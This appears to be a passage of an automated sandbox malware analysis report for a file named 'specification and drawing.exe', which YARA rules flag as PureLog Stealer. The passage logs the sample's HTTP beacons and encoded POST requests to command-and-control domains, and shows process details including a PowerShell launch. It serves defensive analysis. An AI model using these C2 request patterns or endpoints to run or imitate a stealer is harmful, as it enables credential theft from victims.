                                                                                                        Data Ascii: aNXP_jw=aq5smm9Kz2tWoQMCH068AkWe4/Op+OpHJ+H8aLKedxknS6gvHdhL9O2ZKaRFuRWBsMm9OEAi3IPP7J2T1gcX1im58vlduhYYQQL3Sw6xnF5pyorBLVXxmaYEQybAZb7Oo9/waObwZ7Sk2WjN54kiQVibgZ7cNAfofPSd6oiG02f+UDMxOBFHuP4yz7M8yJf5FXE4cBBPmW4+KFvk5Tjh+8rU7f4/+YPdS8gxVHGeZqk+z7IV6H6l3JjlgtQaiqUKrYH+6jS8bdHBxj7fDQ/bGXqn3kMN5wI6zU4P63BkX3/a+c+uEzB5XlXibGyKGTaL1yzl8LG9s3u+j5KY7nPLSF7ZOdRJ1fcVq/+524T+MBeXRnkHCJQKoWMVlURYMQzLUSzpeV/WvCXcQ3BZ4kATn+ez0WEuwt0+o0F3+z0bfJ8wTwOQkeB/9kig2GSHbE3rMCLrc4f5oxkiyDbyveSCeNncBMtb+wJaRPgqk6nKy4/pioF889ecfaUu9gJJEmFk+pEjozxpkWl6BOMEOcKbvkfMmpUpJC1yz1gNaq3ZrSksOqcubIFai9dHeG7S4rE7EG+y3rqsp+qiChrE36R/KTDbx1bv1VD8WJdryvAcScTjbZVDUJbt1fo3EtqHw2nmqny7tdSrN/KMA6P4OJCUjnagcQU0p0gEKx0SYjTwSqUBL/Vwdzx5mBImIQunMWMKmkilV9/ssRw0T3+lOI4+ZHBzcZlCTIxH2Q5HPDkiyuw+8c2SG2KsZAwE3MVvVbRMKBajv75MbBHSIEPNytwaSPUp7OIxPowu/p1kgM9bQLJQUvKPy+iJyBpBdgv8ZGOgKlR90sNS/rxPOsgYzWbQx3wP4x/B03Ufbc/kGSxgFUAK5phS0mPS3PE0XYHM8LPQSA/nxB0byg23VgIkXhc65MYDy1qUYxQNjOqxIwUQMreOtqvl3IUK02InB5DkZhWv1vkpUyZYERCDreLpjHAdEZsk9x03wCuJJSmzNuYa8jQr [TRUNCATED]


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        40192.168.2.65003285.159.66.93802488C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Dec 2, 2024 14:40:32.738020897 CET554OUTGET /jm9b/?aNXP_jw=XoRMlRQavUBSvHE6AV2eFSHD1vC94NgmQfaFO5StTzEKBs4nBsZa6I2TGaV3pACayJ+XHXZH2+vi6MzB3UVzgDaP4LABx1lqbBfrXRaislputLbkLl7Cj+NmRWLfbOqf/tiSO58=&cTT8u=Q4NHoHJ0 HTTP/1.1
                                                                                                        Host: www.restobarbebek.xyz
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Connection: close
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                        Dec 2, 2024 14:40:34.108509064 CET225INHTTP/1.1 404 Not Found
                                                                                                        Server: nginx/1.14.1
                                                                                                        Date: Mon, 02 Dec 2024 13:40:33 GMT
                                                                                                        Content-Length: 0
                                                                                                        Connection: close
                                                                                                        X-Rate-Limit-Limit: 5s
                                                                                                        X-Rate-Limit-Remaining: 19
                                                                                                        X-Rate-Limit-Reset: 2024-12-02T13:40:38.8801182Z


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        41192.168.2.650033162.159.140.104802488C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Dec 2, 2024 14:40:39.986907959 CET810OUTPOST /w21a/ HTTP/1.1
                                                                                                        Host: www.nagasl89.baby
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Origin: http://www.nagasl89.baby
                                                                                                        Referer: http://www.nagasl89.baby/w21a/
                                                                                                        Content-Length: 212
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Cache-Control: max-age=0
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                        Data Raw: 61 4e 58 50 5f 6a 77 3d 47 62 35 65 61 71 56 39 7a 4d 78 68 4a 6c 68 2b 47 43 78 77 48 47 4d 4c 61 35 48 72 35 76 43 48 4c 72 36 6c 5a 65 31 67 73 61 34 52 36 4a 61 79 66 65 30 6d 46 62 4d 72 64 72 62 48 6a 73 79 69 69 49 68 6a 46 7a 2f 4a 49 63 65 78 77 36 59 78 74 48 64 75 38 4b 74 33 7a 69 76 48 52 6f 39 7a 79 4d 33 47 74 4c 35 43 41 42 73 6a 72 67 70 73 4b 6f 31 4e 58 77 2f 4a 67 52 52 2f 57 63 5a 57 44 70 36 52 62 4c 4b 52 69 4c 72 7a 77 47 45 2f 32 55 32 64 4b 4f 2f 74 34 55 4f 62 4c 77 62 6c 2b 6d 36 69 4c 7a 4f 6c 63 50 79 76 66 76 43 42 52 34 67 30 7a 63 33 48 38 6f 57 51 36 42 76 54 62 2b 79 59 4a 71 6b 72 44 34 35 48
                                                                                                        Data Ascii: aNXP_jw=Gb5eaqV9zMxhJlh+GCxwHGMLa5Hr5vCHLr6lZe1gsa4R6Jayfe0mFbMrdrbHjsyiiIhjFz/JIcexw6YxtHdu8Kt3zivHRo9zyM3GtL5CABsjrgpsKo1NXw/JgRR/WcZWDp6RbLKRiLrzwGE/2U2dKO/t4UObLwbl+m6iLzOlcPyvfvCBR4g0zc3H8oWQ6BvTb+yYJqkrD45H
                                                                                                        Dec 2, 2024 14:40:41.528103113 CET844INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 02 Dec 2024 13:40:41 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eBQdz5LeQr4xk3hUsotuMitXm9tKfle7p0T2%2BGw4D4qeQx%2BrxhRQs2oFboregOktoIBxiiQYGJ5dKeNvnYIZA8oN1%2F5OSHZbf3zLIf6N0EvHXGbCQJnpUK76%2FIRh%2FlrlkI%2Bpow%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8ebbbaeb59c98c8d-EWR
                                                                                                        Content-Encoding: gzip
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2056&min_rtt=2056&rtt_var=1028&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=810&delivery_rate=0&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 140


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        42192.168.2.650034162.159.140.104802488C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Dec 2, 2024 14:40:43.165122032 CET834OUTPOST /w21a/ HTTP/1.1
                                                                                                        Host: www.nagasl89.baby
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Origin: http://www.nagasl89.baby
                                                                                                        Referer: http://www.nagasl89.baby/w21a/
                                                                                                        Content-Length: 236
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Cache-Control: max-age=0
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                        Data Raw: 61 4e 58 50 5f 6a 77 3d 47 62 35 65 61 71 56 39 7a 4d 78 68 50 31 52 2b 41 6c 46 77 50 47 4d 49 47 70 48 72 67 2f 43 44 4c 72 6d 6c 5a 66 67 74 74 70 63 52 36 72 79 79 63 63 63 6d 47 62 4d 72 46 62 62 43 37 4d 79 70 69 49 74 72 46 79 54 4a 49 63 36 78 77 2b 63 78 74 32 64 74 39 61 74 78 38 43 76 42 4d 59 39 7a 79 4d 33 47 74 4c 64 34 41 42 30 6a 72 77 5a 73 4b 4a 31 4f 49 41 2f 4b 33 68 52 2f 41 73 5a 4b 44 70 36 2f 62 50 53 72 69 4a 6a 7a 77 44 34 2f 32 42 43 43 41 4f 2f 72 6e 45 50 32 46 31 47 33 79 6e 71 68 4a 68 57 31 41 2f 69 63 65 5a 66 62 4e 4c 67 58 68 4d 58 46 38 71 4f 69 36 68 76 35 5a 2b 4b 59 62 39 6f 4d 4d 4d 63 6b 78 39 63 55 57 36 41 59 58 4d 73 42 38 33 78 31 32 74 48 6d 37 41 3d 3d
                                                                                                        Data Ascii: aNXP_jw=Gb5eaqV9zMxhP1R+AlFwPGMIGpHrg/CDLrmlZfgttpcR6ryycccmGbMrFbbC7MypiItrFyTJIc6xw+cxt2dt9atx8CvBMY9zyM3GtLd4AB0jrwZsKJ1OIA/K3hR/AsZKDp6/bPSriJjzwD4/2BCCAO/rnEP2F1G3ynqhJhW1A/iceZfbNLgXhMXF8qOi6hv5Z+KYb9oMMMckx9cUW6AYXMsB83x12tHm7A==
                                                                                                        Dec 2, 2024 14:40:44.708770990 CET841INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 02 Dec 2024 13:40:44 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dvBNwCKWKzfEEyLKBHjnRXdN%2Bg0eZ9I%2FByqogHL7ecgXzwREtlxo459c9H7pxcdgVawMSCCKp3yNjGy31PX57lgetkco1u6SKOmIJ6T95vwkjN5%2Fu%2Fw8K%2F5Ox29hWjP1nsAK7Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8ebbbaff3eb20f53-EWR
                                                                                                        Content-Encoding: gzip
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1464&min_rtt=1464&rtt_var=732&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=834&delivery_rate=0&cwnd=191&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 140


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        43192.168.2.650035162.159.140.10480
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Dec 2, 2024 14:40:46.994199038 CET1847OUTPOST /w21a/ HTTP/1.1
                                                                                                        Host: www.nagasl89.baby
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Origin: http://www.nagasl89.baby
                                                                                                        Referer: http://www.nagasl89.baby/w21a/
                                                                                                        Content-Length: 1248
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Cache-Control: max-age=0
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                        Data Raw: 61 4e 58 50 5f 6a 77 3d 47 62 35 65 61 71 56 39 7a 4d 78 68 50 31 52 2b 41 6c 46 77 50 47 4d 49 47 70 48 72 67 2f 43 44 4c 72 6d 6c 5a 66 67 74 74 70 55 52 39 59 4b 79 63 39 63 6d 48 62 4d 72 62 72 62 44 37 4d 79 77 69 4c 64 76 46 7a 75 30 49 65 53 78 32 62 49 78 72 44 39 74 33 61 74 78 33 69 76 41 52 6f 39 69 79 4d 48 43 74 4c 74 34 41 42 30 6a 72 7a 42 73 65 49 31 4f 4b 41 2f 4a 67 52 52 37 57 63 5a 32 44 70 69 4a 62 50 48 57 69 36 37 7a 77 69 49 2f 30 33 65 43 43 75 2f 70 6b 45 50 75 46 31 44 70 79 6e 33 51 4a 67 69 62 41 35 65 63 53 75 69 79 64 37 6b 68 35 74 33 69 70 59 79 4c 38 68 32 4a 44 50 4f 66 58 66 38 61 4e 65 59 63 34 71 45 56 44 6f 42 63 65 73 59 31 2f 68 67 38 37 4e 57 42 6a 37 4e 76 76 2f 56 66 76 42 54 57 34 4b 32 34 6a 53 64 4f 32 6b 54 66 2f 6c 79 51 66 44 41 72 50 35 6c 59 6f 6c 4b 6e 39 41 44 62 2f 78 45 38 74 33 55 67 38 48 4c 6f 30 41 59 70 64 6d 71 51 58 74 7a 31 2b 36 41 53 53 48 51 57 6f 4e 42 69 42 69 7a 4a 54 4e 55 48 77 71 36 39 61 4e 63 61 39 6d 7a 54 75 33 6b 76 4d 67 [TRUNCATED]
                                                                                                        Data Ascii: aNXP_jw=Gb5eaqV9zMxhP1R+AlFwPGMIGpHrg/CDLrmlZfgttpUR9YKyc9cmHbMrbrbD7MywiLdvFzu0IeSx2bIxrD9t3atx3ivARo9iyMHCtLt4AB0jrzBseI1OKA/JgRR7WcZ2DpiJbPHWi67zwiI/03eCCu/pkEPuF1Dpyn3QJgibA5ecSuiyd7kh5t3ipYyL8h2JDPOfXf8aNeYc4qEVDoBcesY1/hg87NWBj7Nvv/VfvBTW4K24jSdO2kTf/lyQfDArP5lYolKn9ADb/xE8t3Ug8HLo0AYpdmqQXtz1+6ASSHQWoNBiBizJTNUHwq69aNca9mzTu3kvMg99vwtdPv4wTUyY/3P5Z2aqwjmd459eg3Irpb6tx0UDGHVozHzs+87mVBeSWD5hGr+LyoKDIpPjftfCDWvni5FpDJs7gyUQVRLIRCyya5N3zE59UE/ygEPBGwC4A91pNhpXgk6Dm4YkkICiCB9Ei20tLCXriY0jMjPQSw9RmfRuCcaIpRRpuySb7Kz6YQUdg3Q6WGDTe83nZStqSF7wjH7uDHVYxqEHdA/Sn/cYZUI57I9NMvk24urJq8jJC68RPKJA8hcbmFyQ4XtbHW/upHUudZZqNsCXTj1H1JJHVM1tuIPr9yqT4cvv4Y7NssrmWYAKp+5s+EHJ+PZbtwhI/c1zH2/MPFAuaaXMJt+MDmrRi9p6RDMLzeDUqSvOJZAybkcimZh3ZT2mtUVSsuMw+JNYbRGaYtzA6b5hpcPa49e+Im3eUmc2sR538KxRQO+1PHn6vM3SpsHplGZ8zfzw+46TJqzK0hhp7VbvdTpp2IQr4kRYwMPsTnCzBHnJwmZqxYEsS2wB7gq6CYpf8pXK+y5ax6dVLvuPUVhDvnVxMwldD2/UPtcp7Gw21E/icuCM8xf1vl1519jiJG1BJX3JjMwOeU2nW5XToZ1UZGGpAGXAzYvsXarugWAsdcswxfrDNKYC4BqWC8mCiTnpeVlreScImTwZ1fkw2LQY [TRUNCATED]
                                                                                                        Dec 2, 2024 14:40:48.609563112 CET840INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 02 Dec 2024 13:40:48 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fj2oMbbOY67wlckcy5EAafOiwb2gOlr3ONCh32BGb6rJS%2FQ%2Bv8zQqJ0ox2i%2FV4Y5HGwb6oX0M4bWn5A22afTCO98blEgOM5INu3JaE2p6hNCiWfOnlOfhBUqF5Bb8ZN7%2FkW6Zg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8ebbbb17b82743fe-EWR
                                                                                                        Content-Encoding: gzip
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1566&min_rtt=1566&rtt_var=783&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1847&delivery_rate=0&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 140


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        44192.168.2.650036162.159.140.10480
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Dec 2, 2024 14:40:49.661510944 CET550OUTGET /w21a/?cTT8u=Q4NHoHJ0&aNXP_jw=LZR+ZfxbvtNDeEpFHDBOAnNQReD6jdenS5faavQJiaR4jsC5ZvEsJscNWNTIhM6XzOFPLAXSOfmv47Q4tyBC+fdx4nmbPqtD38XQudBSIRIiqzdGLKpTAxO37HRkObotKIbjEro= HTTP/1.1
                                                                                                        Host: www.nagasl89.baby
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Connection: close
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                        Dec 2, 2024 14:40:51.357806921 CET1236INHTTP/1.1 404 Not Found
                                                                                                        Date: Mon, 02 Dec 2024 13:40:51 GMT
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        vary: Accept-Encoding
                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4Bj%2FhUPlA8uq5yAyuZjDrV2m8Maf1noh2zh%2FEkSNIIo86l%2FuVuM4B%2BwREoHQOzzvaevROgvaeLhdansIE0nH0VlE%2B5eFe%2B7wu9ZiCoLNJc%2FiEa%2B0Aw6bneun38fR7H%2Fwei1Usw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8ebbbb28bb180f53-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1474&min_rtt=1474&rtt_var=737&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=550&delivery_rate=0&cwnd=191&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        Data Raw: 31 66 62 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 69 64 2d 49 44 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 76 69 65 77 70 6f 72 74 2d 66 69 74 3d 63 6f 76 65 72 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 42 75 6b 61 6e 57 6f 72 64 70 72 65 73 73 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 61 67 61 73 6c 38 [TRUNCATED]
                                                                                                        Data Ascii: 1fb4<!DOCTYPE html><html lang="id-ID"><head> <meta charset="utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta name="viewport" content="width=device-width, initial-scale=1, viewport-fit=cover" /><meta name="generator" content="BukanWordpress" /><link rel="icon" type="image/x-icon" href="https://www.nagasl89.baby/favicon.ico" /><link rel="sitemap" href="https://www.nagasl89.baby
                                                                                                        Dec 2, 2024 14:40:51.357861042 CET1236INData Raw: 2f 73 69 74 65 6d 61 70 2e 78 6d 6c 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 52 54 50 20 53 4c 4f 54 4f
                                                                                                        Data Ascii: /sitemap.xml" /><link rel="alternate" type="application/rss+xml" title="RTP SLOTO89 Feed" href="https://www.nagasl89.baby/feed/rss" /> <title>Halaman ini tidak ada! - RTP SLOTO89</title> <meta name="description" content="404 Not Foun
                                                                                                        Dec 2, 2024 14:40:51.357872963 CET448INData Raw: 74 70 73 3a 2f 2f 77 77 77 2e 6e 61 67 61 73 6c 38 39 2e 62 61 62 79 2f 74 68 65 6d 65 73 2f 72 74 70 2f 63 73 73 2f 73 74 79 6c 65 5f 76 33 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 0a
                                                                                                        Data Ascii: tps://www.nagasl89.baby/themes/rtp/css/style_v3.css" type="text/css" media="all"> <link rel="stylesheet" id="twentyfifteen-style-css" href="https://www.nagasl89.baby/themes/rtp/css/styleslot.css" type="text/css" media="all"> <link rel=
                                                                                                        Dec 2, 2024 14:40:51.358064890 CET1236INData Raw: 64 2f 70 6f 70 70 65 72 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 73 64 65 6c 69 76 72 2e 6e 65 74 2f 6e 70 6d 2f 62 6f 6f 74 73 74 72 61 70 40
                                                                                                        Data Ascii: d/popper.min.js"></script> <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-EVSTQN3/azprG1Anm3QDgpJLIm9Nao0Yz1ztcQTwFspd3yD65VohhpuuCOmLASjC" crossorigin="anony
                                                                                                        Dec 2, 2024 14:40:51.358077049 CET1236INData Raw: 20 61 64 61 21 20 2d 20 52 54 50 20 53 4c 4f 54 4f 38 39 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 73 69 74 65 22 20 63 6f 6e 74 65 6e 74 3d 22 40 74 68 65 70 72 61 63 74 69 63 61 6c 64 65 76 22 3e 0a 20 20
                                                                                                        Data Ascii: ada! - RTP SLOTO89"> <meta name="twitter:site" content="@thepracticaldev"> <meta name="twitter:creator" content="@"> <meta name="twitter:title" content=""> <meta name="twitter:description" content="404 Not Found"> <meta na
                                                                                                        Dec 2, 2024 14:40:51.358088970 CET1236INData Raw: 2d 35 31 32 2e 70 6e 67 22 2d 2d 3e 0a 20 20 20 20 3c 21 2d 2d 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 35 32 78 31 35 32 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 72 65 73
                                                                                                        Data Ascii: -512.png"--> ...link rel="apple-touch-icon" sizes="152x152" href="https://res.cloudinary.com/practicaldev/image/fetch/s--l0c3Kmql--/c_limit,f_png,fl_progressive,q_80,w_152/https://practicaldev-herokuapp-com.freetls.fastly.net/assets/devlo
                                                                                                        Dec 2, 2024 14:40:51.358136892 CET1236INData Raw: 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 65 2d 6d 6f 62 69 6c 65 2d 77 65 62 2d 61 70 70 2d 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d
                                                                                                        Data Ascii: <meta name="apple-mobile-web-app-title" content=""> <meta name="application-name" content="">... end of og -->... Google tag (gtag.js) --><script async src="https://www.googletagmanager.com/gtag/js?id=G-73FPR0H3RW"></script><script
                                                                                                        Dec 2, 2024 14:40:51.358149052 CET328INData Raw: 22 73 75 62 6d 69 74 22 20 76 61 6c 75 65 3d 22 43 61 72 69 22 20 63 6c 61 73 73 3d 22 73 65 61 72 63 68 2d 62 75 74 74 6f 6e 22 3e 0d 0a 20 20 20 20 3c 2f 66 6f 72 6d 3e 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 2f 61 72 74 69 63 6c 65 3e 20 20 20 20
                                                                                                        Data Ascii: "submit" value="Cari" class="search-button"> </form> </div></article> <footer id="colophon" class="site-footer" role="contentinfo"> <div class="site-info"> <span c
                                                                                                        Dec 2, 2024 14:40:51.358987093 CET996INData Raw: 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 66 6f 6f 74 65 72 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 2f 2a 20
                                                                                                        Data Ascii: </div> </footer> </div> <script type="text/javascript"> /* <![CDATA[ */ var screenReaderText = {"expand":"<span class=\"screen-reader-text\">expand child menu<\/span>","collapse":"<span class=\"screen-reader-text\">c


                                                                                                        Click to jump to process

                                                                                                        Click to jump to process

                                                                                                        Click to dive into process behavior distribution

                                                                                                        Click to jump to process

                                                                                                        Target ID:0
                                                                                                        Start time:08:36:38
                                                                                                        Start date:02/12/2024
                                                                                                        Path:C:\Users\user\Desktop\specification and drawing.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Users\user\Desktop\specification and drawing.exe"
                                                                                                        Imagebase:0x930000
                                                                                                        File size:917'504 bytes
                                                                                                        MD5 hash:8941CBF2CDD44ECFE97F45A2FED0D94F
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2187012973.00000000056C0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2179156189.0000000003DC9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2178181816.0000000002E0F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        Reputation:low
                                                                                                        Has exited:true

                                                                                                        Target ID:3
                                                                                                        Start time:08:36:42
                                                                                                        Start date:02/12/2024
                                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        Wow64 process (32bit):true
